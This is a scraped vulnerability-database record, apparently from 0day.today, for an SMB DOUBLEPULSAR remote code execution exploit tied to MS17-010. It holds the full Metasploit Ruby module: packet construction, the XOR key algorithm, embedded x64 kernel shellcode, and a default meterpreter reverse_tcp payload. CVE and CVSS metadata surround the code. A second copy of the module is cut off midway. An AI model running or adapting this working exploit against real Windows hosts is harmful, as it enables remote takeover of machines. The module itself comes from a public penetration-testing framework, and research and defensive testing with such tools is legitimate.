"qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0144", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-09-02T22:14:10", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-02T22:14:10", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: 
https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' 
=> 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-03] #"}, "lastseen": "2021-09-02T22:14:10", "differentElements": ["sourceData"], "edition": 5}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "7aba97e6be6787f367ec87402f376b36", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-03T22:12:16", "history": [], "viewCount": 110, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142603", "PACKETSTORM:146236", "PACKETSTORM:142602", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:154690"]}, {"type": "rapid7community", 
"idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "nessus", "idList": ["SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27803", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:42030", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42031", "EDB-ID:43970"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96706", "SMNTC-96703", "SMNTC-96705", "SMNTC-96704", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", 
"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0148", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}], "modified": "2021-09-03T22:12:16", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-03T22:12:16", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: 
https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 